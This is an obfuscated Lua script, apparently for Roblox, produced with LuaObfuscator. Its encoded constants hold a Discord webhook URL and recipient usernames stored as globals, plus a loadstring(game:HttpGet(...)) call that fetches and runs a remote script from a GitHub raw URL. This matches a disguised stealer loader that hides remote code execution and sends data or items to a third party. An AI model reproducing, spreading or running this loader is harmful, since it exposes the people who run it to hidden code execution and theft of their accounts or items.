--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.2.8) ~  Much Love, Ferib 

]]--

do local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=0;local v19;local v20;local v21;local v22;local v23;local v24;local v25;local v26;local v27;local v28;local v29;local v30;while true do if (v18==5) then v27=v24;v28=nil;function v28(...)return {...},v12("#",...);end v18=6;end if (v18==2) then function v22()local v31=v1(v16,v19,v19);v19=v19 + 1 ;return v31;end v23=nil;function v23()local v32,v33=v1(v16,v19,v19 + (5 -3) );v19=v19 + (5 -3) ;return (v33 * 256) + v32 ;end v18=3;end if (v18==4) then function v25()local v34=0 -0 ;local v35;local v36;local v37;local v38;local v39;local v40;while true do if (v34==(4 -2)) then v39=v21(v36,16 + 5 ,(2042 -1392) -(555 + 64) );v40=((v21(v36,(42 -(10 + 8)) + 8 )==(932 -(857 + 74))) and  -(569 -((1411 -1044) + 201))) or (928 -(214 + 713)) ;v34=1 + 2 ;end if (v34==(1 + 0)) then v37=2 -1 ;v38=(v21(v36,1 -0 ,897 -((724 -(416 + 26)) + 595) ) * (2^(1669 -(1523 + 114)))) + v35 ;v34=(6 -4) + 0 ;end if (v34==(3 -0)) then if (v39==0) then if (v38==(1065 -(68 + 997))) then return v40 * (0 -0) ;else v39=1271 -(226 + 1044) ;v37=0 -0 ;end elseif (v39==2047) then return ((v38==(117 -(32 + 85))) and (v40 * ((1 + 0)/(0 + 0 + 0)))) or (v40 * NaN) ;end return v8(v40,v39-(1980 -(892 + (114 -49))) ) * (v37 + (v38/(2^(123 -71)))) ;end if (v34==(0 -0)) then v35=v24();v36=v24();v34=1 -0 ;end end end v26=nil;function v26(v41)local v42=438 -(145 + (721 -428)) ;local v43;local v44;while true do if (v42==(433 -(44 + 386))) then return v6(v44);end if ((1486 -(998 + 488))==v42) then v43=nil;if  not v41 then local v95=0 + 0 + 0 ;while true do if (v95==0) then v41=v24();if (v41==(0 + 0)) then return "";end break;end end end v42=773 -(201 + 571) ;end if (v42==(1140 -(41 + 75 + 1022))) then v44={};for v78=4 -3 , #v43 do v44[v78]=v2(v1(v3(v43,v78,v78)));end v42=2 + 1 ;end if (v42==((888 -(261 + 624)) -2)) then v43=v3(v16,v19,(v19 + v41) -(3 -2) );v19=v19 + v41 ;v42=861 -((1446 -632) + 45) ;end end end v18=5;end if (v18==6) then v29=nil;function v29()local v45=0;local v46;local v47;local v48;local v49;local v50;local v51;local v52;local v53;local v54;while true do if (v45~=(0 -0)) then else v46=0 + 0 ;v47=nil;v45=1 + 0 ;end if (v45~=4) then else v54=nil;while true do if (v46~=(1 + 0)) then else local v98=26 -(11 + 15) ;while true do if (v98==0) then v49=nil;v50=nil;v98=1206 -(902 + 303) ;end if (v98~=(1 -0)) then else v46=4 -2 ;break;end end end if (v46~=3) then else local v99=0;while true do if (v99~=(194 -(26 + 168))) then else v53=nil;v54=nil;v99=1;end if (v99==1) then v46=4 -0 ;break;end end end if (v46==(882 -(284 + 594))) then while true do if (v47~=0) then else local v107=0;while true do if ((684 -(483 + 200))~=v107) then else v47=1 -0 ;break;end if (v107==(0 -0)) then v48=166 -(122 + 44) ;v49=nil;v107=1 -0 ;end end end if (v47~=1) then else local v108=0 -0 ;while true do if (v108==0) then v50=nil;v51=nil;v108=1 + 0 ;end if (v108==1) then v47=1 + 1 ;break;end end end if (v47~=(5 -2)) then else v54=nil;while true do local v110=65 -(30 + 35) ;local v111;while true do if (v110~=(0 + 0)) then else v111=0 -0 ;while true do if (v111==(1258 -(1043 + 214))) then if (v48~=(0 -0)) then else local v129=0 + 0 ;local v130;while true do if (0==v129) then v130=0;while true do if (v130~=(1212 -(323 + 889))) then else v49={};v50={};v130=2 -1 ;end if (v130~=(1 + 0)) then else local v177=580 -(361 + 219) ;local v178;while true do if (v177~=(0 + 0)) then else v178=0;while true do if (v178==1) then v130=322 -(53 + 267) ;break;end if (v178==(0 + 0)) then v51={};v52={v49,v50,nil,v51};v178=983 -(18 + 964) ;end end break;end end end if (v130~=2) then else v48=1 + 0 ;break;end end break;end end end break;end if (v111~=0) then else local v112=0 -0 ;while true do if (v112==(1 + 0)) then v111=1;break;end if (v112~=(0 + 0)) then else if (v48==(851 -(20 + 830))) then local v164=0 + 0 ;local v165;while true do if (0==v164) then v165=126 -(116 + 10) ;while true do if (v165~=(0 + 0)) then else local v180=0 -0 ;while true do if (v180~=1) then else v165=766 -(574 + 191) ;break;end if (v180~=(738 -(542 + 196))) then else v53=v24();v54={};v180=1 -0 ;end end end if (v165==(1 + 1)) then v48=4 -2 ;break;end if (v165~=(1 + 0)) then else local v181=849 -(254 + 595) ;local v182;while true do if (0~=v181) then else v182=0 + 0 ;while true do if (v182~=(2 -1)) then else v165=2;break;end if (v182~=0) then else for v185=1791 -(573 + 1217) ,v53 do local v186=0 -0 ;local v187;local v188;local v189;local v190;while true do if (v186~=(4 -2)) then else while true do if (v187==(1551 -(1126 + 425))) then local v198=405 -(118 + 287) ;local v199;while true do if (v198==(0 -0)) then v199=0 -0 ;while true do if (v199==(0 + 0)) then local v211=0 -0 ;while true do if (v211~=0) then else v188=0;v189=nil;v211=1122 -(118 + 1003) ;end if (v211~=1) then else v199=2 -1 ;break;end end end if ((378 -(142 + 235))==v199) then v187=807 -(118 + 688) ;break;end end break;end end end if (v187~=1) then else v190=nil;while true do if (v188==(48 -(25 + 23))) then local v205=0 -0 ;local v206;local v207;while true do if ((0 + 0)==v205) then v206=0;v207=nil;v205=1;end if (v205==(978 -(553 + 424))) then while true do if ((0 -0)~=v206) then else v207=0 + 0 ;while true do if (v207==(1 + 0)) then v188=3 -2 ;break;end if (v207~=(732 -(16 + 716))) then else v189=v22();v190=nil;v207=1 -0 ;end end break;end end break;end end end if (v188~=(98 -(11 + 86))) then else if (v189==(2 -1)) then v190=v22()~=0 ;elseif (v189==(287 -(175 + 110))) then v190=v25();elseif (v189==3) then v190=v26();end v54[v185]=v190;break;end end break;end end break;end if (v186~=1) then else v189=nil;v190=nil;v186=2;end if (v186~=0) then else v187=0 + 0 ;v188=nil;v186=4 -3 ;end end end v52[1799 -(503 + 1293) ]=v22();v182=2 -1 ;end end break;end end end end break;end end end if ((2 + 0)~=v48) then else local v166=0;local v167;while true do if (v166~=(0 + 0)) then else v167=0 + 0 ;while true do local v179=0 + 0 ;while true do if (v179~=(0 + 0)) then else if (v167~=(2 -1)) then else return v52;end if ((533 -(43 + 490))~=v167) then else local v183=0 -0 ;while true do if (v183==(2 -1)) then v167=1 + 0 ;break;end if (v183==0) then for v191=3 -2 ,v24() do local v192=859 -(240 + 619) ;local v193;local v194;while true do if (v192~=1) then else while true do if (v193~=(0 -0)) then else v194=v22();if (v21(v194,1 + 0 ,1)~=(0 -0)) then else local v200=0;local v201;local v202;local v203;local v204;while true do if ((753 -(239 + 514))~=v200) then else local v209=1744 -(1344 + 400) ;while true do if (v209~=(1 + 0)) then else v200=1330 -(797 + 532) ;break;end if (v209~=0) then else v201=0 + 0 ;v202=nil;v209=1;end end end if (v200~=2) then else while true do if (v201==(2 + 1)) then if (v21(v203,12 -9 ,2 + 1 )~=(2 -1)) then else v204[4]=v54[v204[12 -8 ]];end v49[v191]=v204;break;end if (v201~=(1204 -(373 + 829))) then else local v213=731 -(476 + 255) ;local v214;while true do if ((1739 -(404 + 1335))==v213) then v214=0;while true do if (v214==0) then local v222=1130 -(369 + 761) ;while true do if ((0 + 0)~=v222) then else if (v21(v203,1 -0 ,1 + 0 )~=1) then else v204[3 -1 ]=v54[v204[240 -(64 + 174) ]];end if (v21(v203,1 + 1 ,2)~=(1 -0)) then else v204[339 -(144 + 192) ]=v54[v204[340 -(10 + 327) ]];end v222=1;end if (v222~=(1 + 0)) then else v214=339 -(118 + 220) ;break;end end end if (v214==(1 + 0)) then v201=219 -(42 + 174) ;break;end end break;end end end if (v201==(0 + 0)) then local v215=0 + 0 ;local v216;while true do if (v215~=(0 + 0)) then else v216=1504 -(363 + 1141) ;while true do if (v216==(1580 -(1183 + 397))) then local v223=0;while true do if ((0 -0)==v223) then v202=v21(v194,471 -(270 + 199) ,3);v203=v21(v194,4,6);v223=2 -1 ;end if ((1 + 0)==v223) then v216=1 + 0 ;break;end end end if ((1 + 0)==v216) then v201=1;break;end end break;end end end if (v201==(1976 -(1913 + 62))) then local v217=0 + 0 ;while true do if ((0 -0)~=v217) then else local v220=0 + 0 ;local v221;while true do if ((1933 -(565 + 1368))==v220) then v221=0 + 0 ;while true do if (v221~=(0 -0)) then else local v224=1661 -(1477 + 184) ;while true do if (v224~=(0 -0)) then else v204={v23(),v23(),nil,nil};if (v202==0) then local v229=0 -0 ;local v230;while true do if (v229==(1790 -(1010 + 780))) then v230=0 -0 ;while true do if (v230~=(0 -0)) then else v204[3]=v23();v204[4]=v23();break;end end break;end end elseif (v202==(305 -(244 + 60))) then v204[3 + 0 ]=v24();elseif (v202==(478 -(41 + 435))) then v204[7 -4 ]=v24() -(2^16) ;elseif (v202~=3) then else local v235=1001 -(938 + 63) ;local v236;local v237;while true do if (v235~=(1 + 0)) then else while true do if (v236~=(1125 -(936 + 189))) then else v237=0 + 0 ;while true do if (v237==(0 -0)) then v204[1616 -(1565 + 48) ]=v24() -(2^(10 + 6)) ;v204[1578 -(1281 + 293) ]=v23();break;end end break;end end break;end if (v235==(1138 -(782 + 356))) then v236=0 -0 ;v237=nil;v235=268 -(176 + 91) ;end end end v224=2 -1 ;end if (v224~=(1 -0)) then else v221=1093 -(975 + 117) ;break;end end end if (v221~=(1876 -(157 + 1718))) then else v217=1 + 0 ;break;end end break;end end end if (v217~=1) then else v201=2;break;end end end end break;end if (v200~=1) then else local v210=0;while true do if ((0 -0)~=v210) then else v203=nil;v204=nil;v210=3 -2 ;end if (v210==(1019 -(697 + 321))) then v200=5 -3 ;break;end end end end end break;end end break;end if (v192~=(0 + 0)) then else local v197=0 -0 ;while true do if (v197==(0 -0)) then v193=0;v194=nil;v197=1 + 0 ;end if (v197~=(1 + 0)) then else v192=1 + 0 ;break;end end end end end for v195=1 -0 ,v24() do v50[v195-(2 -1) ]=v29();end v183=1 -0 ;end end end break;end end end break;end end end v112=1785 -(214 + 1570) ;end end end end break;end end end break;end if (v47==(1457 -(990 + 465))) then local v109=1227 -(322 + 905) ;while true do if ((612 -(602 + 9))~=v109) then else v47=1192 -(449 + 740) ;break;end if (v109==(872 -(826 + 46))) then v52=nil;v53=nil;v109=948 -(245 + 702) ;end end end end break;end if (v46~=(628 -(512 + 114))) then else v51=nil;v52=nil;v46=9 -6 ;end if ((0 + 0)==v46) then local v100=0 -0 ;while true do if (v100~=(0 + 0)) then else v47=0 + 0 ;v48=nil;v100=1;end if (v100==(1 + 0)) then v46=3 -2 ;break;end end end end break;end if (v45~=(1997 -(109 + 1885))) then else v52=nil;v53=nil;v45=1902 -(260 + 1638) ;end if (v45~=(441 -(382 + 58))) then else v48=nil;v49=nil;v45=6 -4 ;end if (v45==(817 -(98 + 717))) then v50=nil;v51=nil;v45=3 + 0 ;end end end v30=nil;v18=7;end if (v18==0) then v19=1;v20=nil;v16=v4(v3(v16,5),"..",function(v55)if (v1(v55,2)==79) then local v70=0;while true do if (v70==0) then v20=v0(v3(v55,1,1));return "";end end else local v71=v2(v0(v55,16));if v20 then local v80=v5(v71,v20);v20=nil;return v80;else return v71;end end end);v18=1;end if (v18==3) then v24=nil;function v24()local v56,v57,v58,v59=v1(v16,v19,v19 + 3 );v19=v19 + (6 -2) ;return (v59 * (21188875 -4411659)) + (v58 * (9679 + 55857)) + (v57 * (197 + 59)) + v56 ;end v25=nil;v18=4;end if (v18==7) then function v30(v60,v61,v62)local v63=0;local v64;local v65;local v66;while true do if (v63==1) then v66=v60[3];return function(...)local v81=v64;local v82=v65;local v83=v66;local v84=v28;local v85=1;local v86= -1;local v87={};local v88={...};local v89=v12("#",...) -1 ;local v90={};local v91={};for v96=0,v89 do if (v96>=v83) then v87[v96-v83 ]=v88[v96 + 1 ];else v91[v96]=v88[v96 + 1 ];end end local v92=(v89-v83) + 1 ;local v93;local v94;while true do local v97=0;while true do if (v97==1) then if (v94<=10) then if (v94<=4) then if (v94<=1) then if (v94>0) then v85=v93[3];else v91[v93[2]]=v93[3]~=0 ;end elseif (v94<=2) then v91[v93[2]]=v93[3];elseif (v94==3) then local v131=v93[2];local v132,v133=v84(v91[v131](v13(v91,v131 + 1 ,v93[3])));v86=(v133 + v131) -1 ;local v134=0;for v152=v131,v86 do local v153=0;while true do if (v153==0) then v134=v134 + 1 ;v91[v152]=v132[v134];break;end end end else v91[v93[2]]=v93[3];end elseif (v94<=7) then if (v94<=5) then local v117=0;local v118;local v119;while true do if (v117==1) then v91[v118 + 1 ]=v119;v91[v118]=v119[v93[4]];break;end if (v117==0) then v118=v93[2];v119=v91[v93[3]];v117=1;end end elseif (v94==6) then v91[v93[2]][v93[3]]=v93[4];else do return;end end elseif (v94<=8) then if (v91[v93[2]]==v93[4]) then v85=v85 + 1 ;else v85=v93[3];end elseif (v94>9) then v91[v93[2]]();else v91[v93[2]][v93[3]]=v93[4];end elseif (v94<=15) then if (v94<=12) then if (v94>11) then local v120=0;local v121;local v122;local v123;local v124;while true do if (v120==2) then for v162=v121,v86 do local v163=0;while true do if (v163==0) then v124=v124 + 1 ;v91[v162]=v122[v124];break;end end end break;end if (v120==0) then v121=v93[2];v122,v123=v84(v91[v121](v13(v91,v121 + 1 ,v93[3])));v120=1;end if (v120==1) then v86=(v123 + v121) -1 ;v124=0;v120=2;end end elseif (v91[v93[2]]==v93[4]) then v85=v85 + 1 ;else v85=v93[3];end elseif (v94<=13) then local v125=0;local v126;while true do if (v125==0) then v126=v93[2];v91[v126]=v91[v126](v13(v91,v126 + 1 ,v86));break;end end elseif (v94>14) then v91[v93[2]]=v62[v93[3]];else v91[v93[2]]();end elseif (v94<=18) then if (v94<=16) then do return;end elseif (v94>17) then v91[v93[2]]=v93[3]~=0 ;else local v146=0;local v147;local v148;while true do if (v146==1) then v91[v147 + 1 ]=v148;v91[v147]=v148[v93[4]];break;end if (v146==0) then v147=v93[2];v148=v91[v93[3]];v146=1;end end end elseif (v94<=19) then v91[v93[2]]=v62[v93[3]];elseif (v94==20) then local v149=v93[2];v91[v149]=v91[v149](v13(v91,v149 + 1 ,v86));else v85=v93[3];end v85=v85 + 1 ;break;end if (v97==0) then v93=v81[v85];v94=v93[1];v97=1;end end end end;end if (v63==0) then v64=v60[1];v65=v60[2];v63=1;end end end return v30(v29(),{},v17)(...);end if (v18==1) then v21=nil;function v21(v67,v68,v69)if v69 then local v72=0;local v73;while true do if (v72==((1619 -(1427 + 192)) + 0)) then v73=(v67/((1 + 0 + 1)^(v68-(2 -1))))%((6 -4)^(((v69-(1 + (0 -0))) -(v68-(1 + 0))) + 1 + 0)) ;return v73-(v73%(1 + 0)) ;end end else local v74=(1 + 0 + 1)^(v68-1) ;return (((v67%(v74 + v74))>=v74) and (1434 -(797 + 636))) or (0 -0) ;end end v22=nil;v18=2;end end end v15("LOL!0C3O00028O00026O00F03F03023O005F4703073O00576562682O6F6B037A3O00682O7470733A2O2F646973636F72642E636F6D2F6170692F776562682O6F6B732F2O31322O33323339323731382O3038373433372F7A31506B706D79513849646A6E2D426E67745649622O5A45546A386532516C634D596F466F5A625630457A64395947337359367379394E4C2D775A7A364B766477796B3520030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403463O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F4C7970686572582F4D6F7269536372697074732F6D61696E2F4D6F72695363726970745A03083O00557365724E616D65030C3O004B696E675F4669726534363203093O00557365724E616D653200173O0012023O00013O0026083O000E000100020004013O000E000100120F000100033O00300600010004000500120F000100063O00120F000200073O002011000200020008001202000400094O0012000500014O0003000200054O001400013O00022O000E0001000100010004013O001600010026083O0001000100010004013O0001000100120F000100033O0030060001000A000B00120F000100033O0030060001000C000B0012023O00023O0004013O000100012O00073O00017O00",v9(),...);end
